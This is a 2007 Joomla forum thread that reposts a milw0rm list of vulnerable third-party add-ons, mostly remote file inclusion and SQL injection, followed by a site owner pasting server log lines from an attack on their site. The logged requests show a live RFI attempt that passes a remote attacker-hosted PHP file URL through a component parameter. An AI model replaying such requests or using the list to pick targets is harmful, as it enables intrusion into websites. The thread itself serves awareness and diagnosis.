It is always great to see the vulns so you may patch them yourself
| Joomla! http://forum.joomla.org/ |
|
| milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] http://forum.joomla.org/viewtopic.php?f=296&t=215577 |
Page 1 of 1 |
| Author: | gustavo [ Sun Sep 23, 2007 4:08 pm ] |
| Post subject: | milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability 2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability 2007-10-08 - Joomla component MOSMediaLite451 - Remote File Inclusion Vulnerability 2007-10-07 - Joomla Component wmtportfolio 1.0 - Remote File Inclusion Vulnerability 2007-10-07 - Joomla Flash Image Gallery Component - Remote File Inclusion Vulnerability 2007-10-06 - Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability 2007-09-21 - Joomla Component com_slideshow - Remote File Inclusion Vulnerability 2007-09-16 - Joomla Component joom12Pic 1.0 - Remote File Inclusion Vulnerability 2007-09-15 - Joomla Component Flash Fun! 1.0 - Remote File Inclusion Vulnerability 2007-09-13 - Joomla Component joomlaradio v5 - Remote File Inclusion Vulnerability 2007-09-08 - Joomla Component Restaurante - Remote File Upload Vulnerability 2007-09-01 - Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit 2007-08-23 - Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit 2007-08-23 - Joomla Component EventList <= 0.8 (did) - SQL Injection Vulnerability 2007-08-23 - Joomla Component Nice Talk <= 0.9.3 (tagid) - SQL Injection Vulnerability 2007-08-23 - Joomla Component RSfiles <= 1.0.2 (path) - File Download Vulnerability 2007-08-23 - Joomla Component NeoRecruit <= 1.4 (id) - SQL Injection Vulnerability 2007-07-31 - Joomla Component com_gmaps 1.00 (mapId) - Remote SQL Injection 2007-07-22 - Joomla! CMS 1.5 beta 2 (search) - Remote Code Execution Vulnerability 2007-07-19 - Joomla Component Pony Gallery <= 1.5 - SQL Injection Vulnerability 2007-07-18 - Joomla Component Expose <= RC35 - Remote File Upload Vulnerability 2007-05-28 - Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit 2007-04-23 - Joomla 1.5.0 Beta (pcltar.php) - Remote File Inclusion Vulnerability 2007-04-17 - Joomla Template Be2004-2 (index.php) - Remote File Inclusion Vulnerability 2007-04-17 - Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) - Remote File Inclusion Vulnerability 2007-04-14 - Mambo/Joomla Component Article 1.1 - Remote File Include Exploit 2007-04-14 - Joomla Module AutoStand 1.0 R - Remote File Inclusion Vulnerability 2007-04-11 - Joomla Component mosMedia <= 1.0.8 - Remote File Inclusion Vulnerability 2007-04-10 - Joomla/Mambo Component Taskhopper 1.1 - Remote File Include Exploit 2007-03-27 - Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit 2007-03-24 - Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit 2007-03-24 - Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit 2007-03-23 - Joomla Component Joomlaboard 1.1.1 (sbp) - Remote File Inclusion Vulnerability 2007-03-23 - Joomla/Mambo Component SWmenuFree 4.0 - Remote File Inclusion Vulnerability 2006-11-17 - MosReporter Joomla Component 0.9.3 - Remote File Inclusion Vulnerability 2006-08-19 - Joomla <=1.0.10 (poll component) - Arbitrary Add Votes Exploit 2006-08-18 - Joomla Kochsuite Component <= 0.9.4 - Remote File Inclusion Vulnerability 2006-08-18 - Joomla Link Directory Component <= 1.0.3 - Remote File Inclusion Vulnerability 2006-08-18 - Joomla Artlinks Component <= 1.0b4 - Remote File Inclusion Vulnerability 2006-08-17 - Joomla Mosets Tree <= 1.0 - Remote File Inclusion Vulnerability 2006-08-17 - Joomla com_jim Component <= 1.0.1 - Remote File Inclusion Vulnerability 2006-08-13 - Joomla Webring Component <= 1.0 - Remote File Inclusion Vulnerability 2006-08-07 - Joomla JD-Wiki Component <= 1.0.2 - Remote File Inclusion Vulnerability 2006-07-30 - Joomla LMO Component <= 1.0b2 - Remote File Inclusion Vulnerability 2006-07-30 - Joomla com_bayesiannaivefilter Component <= 1.1 - Remote File Inclusion Vulnerability 2006-06-17 - Joomla <= 1.0.9 (Weblinks) - Remote Blind SQL Injection Exploit 2006-04-19 - Mambo <= 4.5.3 , Joomla <=1.0.7 (feed) - Denial of Service Exploit *RFI: Remote File Inclusion |
|
| Author: | gustavo [ Sat Oct 06, 2007 6:42 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
Add: 2007-10-06 Joomla panoramic component 1.0 - Remote File Inclusion Vulnerability Component : Joomla panoramic component - version 1.0 site: webmaster-tips.net/panoramic-picture-viewer.html |
|
| Author: | K1u [ Sat Oct 06, 2007 7:01 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
It is always great to see the vulns so you may patch them yourself
|
|
| Author: | gustavo [ Tue Oct 09, 2007 3:42 am ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
add 2007-10-08 - Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability Component : MOSMediaLite451 site: djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/ add 2007-10-07 - Joomla Component wmtportfolio 1.0 Remote File Inclusion Vulnerability Component : WMT Portfolio - version 1.0 site: webmaster-tips.net/wmt-joomla-component-portfolio.html add 2007-10-07 - Joomla Flash Image Gallery Component Remote File Inclusion Vulnerability Component : Flash Image Gallery site: webmaster-tips.net/flash-image-gallery.html |
|
| Author: | gustavo [ Thu Oct 11, 2007 2:30 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
add 2007-10-10 - Joomla Component JContentSubscription 1.5.8 - Remote File Inclusion Vulnerability Component : JContentSubscription site: joomlaequipment.com/index.php?option=com_content&task=view&id=7&Itemid=34 add 2007-10-10 - Joomla Component MP3 Allopass 1.0 - Remote File Inclusion Vulnerability Component : JContentSubscription site: joomlaratings.com |
|
| Author: | Xirtam [ Wed Nov 14, 2007 12:46 pm ] |
| Post subject: | Re: milw0rm dot com - List of Vulnerable 3rd Party Add-ons [2006/2007] |
Are you sure that joomlaradio v4 is OK? My site is suspended because it is someway hacked. I found this in the logs: Quote: 213.173.251.138 - - [13/Nov/2007:00:16:01 +0100] "GET //index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 724 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" Quote: 213.173.251.138 - - [13/Nov/2007:00:16:34 +0100] "GET /index.php/weblinks/Joomla//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 404 5938 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" Quote: 213.173.251.138 - - [13/Nov/2007:00:28:18 +0100] "GET /index.php//index.php?option=com_restaurante&task=http://hivhash.com/hiv//ws/phpmic.txt.txt? HTTP/1.1" 200 12748 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" I am not using the com_restaurante component, never heard of it. |
|
| Page 1 of 1 | All times are UTC |
| Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |
|